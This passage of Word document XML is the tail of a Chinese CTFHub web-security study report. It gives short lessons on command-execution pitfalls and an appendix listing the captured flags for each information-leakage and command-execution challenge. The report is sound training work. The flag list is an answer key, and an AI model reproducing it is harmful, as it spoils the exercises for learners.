          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> —— </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>if (!strpos(...))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 在"位置 0"时形同虚设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`exec` 只收 stdout</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> —— 空白 ≠ 没执行，可能只是报错走了 stderr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`&lt;?php` 在 HTML 里是注释开头</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> —— 浏览器渲染会吞掉，Response 才是真相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一句话总结</w:t>
      </w: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b/>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>信息泄露考的是"你知道该看哪里"，命令执行考的是"你知道能替换什么"。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="454"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="454"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>两者的答案都不在教程里，在你自己的环境里 —— 所以必须复现。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:color="BFBFBF"/>
        </w:pBdr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附录 A：全部 flag 汇总（17 个）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信息泄露模块（9 + 5）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ctfhub{95c6f03d7cda19058d88ec1f}    网站源码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ctfhub{ff20cd30144373eedaa01abc}    bak 文件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ctfhub{1bbffdd2cca2f93ddc0ca8d8}    vim 缓存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ctfhub{2e801a81a591f99ffca80e07}    .DS_Store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ctfhub{dc8b0894d5a5689a22a35ffe}    Git Log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ctfhub{03f0f3f844084d7134cedad3}    Git Stash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ctfhub{b0571eeb61f6343ced553555}    Git 未删变体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ctfhub{6fd7676ba56da2a90a11af9a}    SVN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ctfhub{9260b70ead69a60fb2e0d968}    HG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ctfhub{1e5a12263055250cb6c8f170}    302 跳转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ctfhub{cf2690f992c9ebe484432aee}    Cookie 伪造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ctfhub{db7ba83bb0e787993a2fa43f}    基础认证 1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ctfhub{b227a7576366a4be3848faa5}    基础认证 2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ctfhub{d5b85603ca77329a3ae5a18}    Git 历史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命令执行模块（8）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ctfhub{64e8e0dae77db7d9c15ef8ab}    命令注入-无过滤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ctfhub{7234bb617c6421e4b8e40365}    eval 代码执行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ctfhub{5c3d2c0615beb813269640b6}    过滤 cat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ctfhub{7d4f698eda802c44829c9db7}    过滤空格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ctfhub{fba85d19b6751d803b3cee7c}    过滤目录分隔符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ctfhub{613d57ca6515a6b766b7caa0}    过滤运算符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ctfhub{7d928b22123076276bb32251}    综合练习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ctfhub{b4e8289cf23e6289829fb568}    文件包含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ctfhub{29c7fc65ea7034f067119535}    文件包含-php://input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ctfhub{95366c4682c791d1ff3f4272}    文件包含-filter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ctfhub{3e8215ea4ad95ff54cb15fe2}    文件包含-无 shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:color w:val="2E548A"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>独立复现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ctfhub{009ee4ed36138139d7349d59}    Git Log 复现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ctfhub{053da77b26b117ed9a380b03}    Git Stash 复现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="252" w:lineRule="auto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ctfhub{52dd316df7c89131d95b8161}    HG 第二实例</w:t>
      </w:r>
    </w:p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B63"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>附录 B：参考材料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4873"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DE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notes/17-信息泄露漏洞.md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769 行，五类信息泄露 + 三库统一框架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notes/18-做题常见疑问.md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836 行，25 个实战问答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notes/20-信息泄露作业答案.md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403 行，五问完整答案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notes/21-PHP命令执行与绕过.md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546 行，8 函数实测 + 6 类绕过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writeups/靶场/CTFHub-GitStash.md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535 行，Stash 专题 WP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writeups/靶场/CTFHub-基础认证.md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494 行，Basic Auth 专题 WP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logs/2026-10-17.md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361 行，当日流水（含 12 条踩坑）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:color="BFBFBF"/>
        </w:pBdr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报告完成日期</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>：2026-10-21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环境</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>：WSL2 + Kali Rolling / PHP 8.4.24（本地实测）/ PHP 5.6.40（靶场）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